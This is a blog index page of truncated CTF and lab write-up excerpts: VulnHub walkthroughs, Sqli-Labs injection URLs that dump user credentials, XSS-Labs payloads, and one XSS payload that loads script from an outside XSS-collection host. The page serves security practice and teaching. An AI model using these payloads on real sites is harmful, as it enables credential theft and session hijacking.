N1etzsche-CSDN博客

原创 CTF做题笔记13

CISCN2019 华北赛区 Day1 Web1 Dropbox<?phpclass User { public $db;}class File{ public $filename;}class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt

2022-05-01 22:34:54 268

原创 Thales

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 13:46 CSTNmap scan report for 192.168.0.1Host is up (0.00041s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report

2022-04-20 17:58:41 1340

原创 Python学习笔记——多线程

import _threadfrom time import sleep, ctimeloops = [4, 2]def loop(nloop, nsec, lock): print('start loop', nloop, 'at:', ctime()) sleep(nsec) print('loop', nloop, 'done at:', ctime()) lock.release()def main(): print('starting a

2022-04-20 12:46:29 751

原创 CTF做题笔记12

[GYCTF2020]Blacklist?inject=1%27error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1?inject=1%27;show%20tables;#array(2) { [0]=>

2022-04-12 19:31:37 424

原创 CTF做题笔记11

[HCTF 2018]adminimport sysimport zlibfrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) d

2022-04-07 16:07:31 434

原创 Empire-Lupin-One

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 20:21 CSTNmap scan report for 192.168.0.1Host is up (0.00036s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-04-06 22:06:53 6425

原创 Deathnote

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CSTNmap scan report for 192.168.0.1Host is up (0.00050s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report f

2022-04-05 16:30:19 572

原创 CTF做题笔记10

[ZJCTF 2019]NiZhuanSiWei?text=data://text/pain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.phpwelcome to the zjctfPD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWM

2022-04-04 22:38:43 332

原创 Empire: Breakout

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CSTNmap scan report for 192.168.0.1Host is up (0.00054s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-04-04 13:16:17 558

原创 Jangow

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CSTNmap scan report for 192.168.0.1Host is up (0.00042s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan r

2022-04-02 16:44:01 621 1

原创 CTF做题笔记9

[ACTF2020 新生赛]BackupFile$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/ -t 40 --exclude-status 403,401[19:57:33] 200 - 347B - /index.php.bak?index.php?key=123[极客大挑战 2019]PHP/www.zip&

2022-03-29 17:22:19 3534

原创 Earth

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:19 CSTNmap scan report for 192.168.0.1Host is up (0.00047s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-28 23:05:33 898

原创 CTF做题笔记8

[2022DASCTF]ezpop<?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public $f1;

2022-03-27 14:15:51 729

原创 Napping

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CSTNmap scan report for 192.168.0.1Host is up (0.00040s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-26 20:36:28 663

原创 CTF做题笔记7

[护网杯 2018]easy_tornadohttp://73fdf6fb-85e6-41f4-a577-50bc91dd23c1.node4.buuoj.cn:81/error?msg={{22}}<html><head><style>body{font-size: 30px;}</style></head><body>22</body></html>http://73fdf6fb-85e6

2022-03-25 14:23:22 1165

原创 VulnHub—Red

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CSTNmap scan report for 192.168.0.1Host is up (0.00045s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-23 10:58:13 6273

原创 Web-Machine-N7

$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CSTNmap scan report for 192.168.0.1Host is up (0.00048s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report

2022-03-20 22:16:38 1873 1

原创 Os-ByteSec

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CSTNmap scan report for 192.168.0.1Host is up (0.00044s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo

2022-03-18 22:05:59 4897

原创 C++ 学习笔记

Less-1：#include <iostream>using namespace std;int main(){ cout << "Hello World"; return 0;}Less-2 :#include<iostream>#include<limits>using namespace std;extern int a, b;extern int c;extern float f;int main(i

2022-03-16 12:36:55 763

原创 Python脚本——MD5碰撞和HTML转义

import hashlibfor i in range(1,100000000000): s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6] if s == "184b43": print(i) breakin_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcX

2022-02-22 14:01:58 766

原创 CTF做题笔记6

BUU XSS COURSE 1:</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22

2022-02-20 18:47:39 5062

原创 [第二章 web进阶]XSS闯关

Less-1:<script>alert('xss')</script>Less-2:';alert(1);'Less-3:'';alert(1);//Less-4:jumpUrl=javascript:alert('xss')Less-5:?autosubmit=1&action=javascript:alert(1)Less-6:{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }

2022-02-20 13:27:44 558

原创 Xss-Labs做题笔记:Less-1 - Less-18

Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > // Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>x

2022-02-14 19:04:48 204

原创 Xss-Labs做题笔记:Less-1 - Less-9

Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > //Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>xs

2022-02-14 12:40:38 285

原创 Bool盲注——成绩查询

from aiohttp import Payloadfrom cherrypy import urlimport requestsimport timefrom sympy import parallel_poly_from_exprurl = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="payload1 = "1^(ascii(substr((select(database())),{}

2022-02-13 09:22:48 3016

原创 CTF做题笔记5

xctf-supersqli:?inject=-1';show databases;--+?inject=-1';show tables;--+?inject=-1';show columns from `1919810931114514`;--+?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;--+xctf-NewsCenter:1' uni

2022-01-27 15:22:17 3347

原创 Sqli-Labs做题笔记:Less-1 - Less-65

sqli-labs 学习笔记SQL注入分类：可回显的注入：可以联合查询的注入报错注入通过注入进行DNS请求，从而达到回显的目的不可回显的注入：Bool盲注时间盲注二次注入万能语句：1 or 1=1 – #1’ or 1=1 – #1" or 1=1 – #1) or 1=1 – #1’) or 1=1 – #1") or 1=1 – #1)) or 1=1 – #1’) or 1=1-- #1") or 1=1-- #判断闭合:uname=1&

2022-01-26 17:07:15 164

原创 Sqli-Labs做题笔记:Less-46 - Less-53

ORDER BY 注入Less-46:localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))http://localhost/sqlilabs/Less-46/?sort=rand(ascii(mid((select%20group_concat(us

2022-01-26 11:40:46 2111

原创 Python学习笔记——顺序结构

乘法表:for i in range(1, 10): for j in range(1, i+1): print('{}*{}={}\t'.format(j, i, j*i), end='') print()判断素数:from numpy import appendnum = []i = 2for i in range(1, 300): for j in range(2, i): if(i % j == 0): b

2022-01-26 10:22:08 784

原创 Sqli-Labs做题笔记:Less-39 - Less-45

Less-39:http://localhost/sqlilabs/Less-39/?id=1;insert%20into%20users(id,username,password)%20values(69,%27joker%27,%27joker%27)--+Less-40:http://localhost/sqlilabs/Less-40/?id=2%27);insert%20into%20users(id,username,password)%20values(69,%27joker%27,%

2022-01-25 17:30:04 295

原创 Sqli-Labs做题笔记:Less-32 - Less-38

宽字节注入：Less-32:http://localhost/sqlilabs/Less-32/?id=-1%df%27%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00Less-33:http://localhost/sqlilabs/Less-33/?id=-1%d

2022-01-25 16:01:32 1004

原创 Sqli-Labs做题笔记:Less-27 - Less-31

Less-27:http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00Less-27ahttp://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_

2022-01-24 17:24:59 1671

原创 Sqli-Labs做题笔记:Less-21 - Less-26a

绕过：过滤关键字穿插关键字绕过：select selselctector oorrunion ununionion大小写转换：select SelECtor Orunion uNIon十六进制转换：select selec\x74or o\x72union unio\x6e双重URL编码：select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34

2022-01-23 23:50:14 530

原创 Sqli-Labs做题笔记:Less-11 - Less-20

SQL注入分类：可回显的注入：可以联合查询的注入报错注入通过注入进行DNS请求，从而达到回显的目的不可回显的注入：Bool盲注时间盲注二次注入万能语句：1 or 1=1 – #1’ or 1=1 – #1" or 1=1 – #1) or 1=1 – #1’) or 1=1 – #1") or 1=1 – #1)) or 1=1 – #1’) or 1=1-- #1") or 1=1-- #判断闭合:uname=1&passwd=1 or

2022-01-22 14:56:12 625

原创 Bool盲注脚本

import requestschars = "qwertyuiopasdfghjklzxcvbnm0123456789}{"url = "http://localhost/sqli-labs-kali2-master/Less-15/"for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {

2022-01-21 22:16:45 646

原创 Sqli-Labs做题笔记:Less-1 - Less-10

sqli-labsLess-1:http://localhost/sqli-labs-kali2-master/Less-1/?id=-1%27+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+Less-2:http://localhost/sqli-labs-kali2-master/Less-2/?id=-1+union+select+1,group_concat(usern

2022-01-19 16:01:55 568

空空如也

空空如也